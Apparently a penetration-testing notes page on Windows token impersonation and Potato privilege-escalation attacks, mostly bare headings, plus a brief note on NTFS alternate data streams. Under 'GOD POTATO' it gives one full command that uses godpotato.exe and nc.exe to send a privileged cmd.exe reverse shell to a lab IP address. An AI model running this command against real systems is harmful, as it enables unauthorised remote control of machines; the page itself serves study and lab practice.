Impersonation and Potato Attacks

Token Impersonation Overview

Token impersonation explained

HTB Machine Jeeves

Potato Attack Overview

High level Overview from foxglovesecurity

Escalation via Potato Attack

After getting a meterpreter shell

Inside of new meterpreter shell

Manual Juicy Potato Attack

GOD POTATO

.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"

Resources

Technical Overview
Other Version

Bonus

Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

Last updated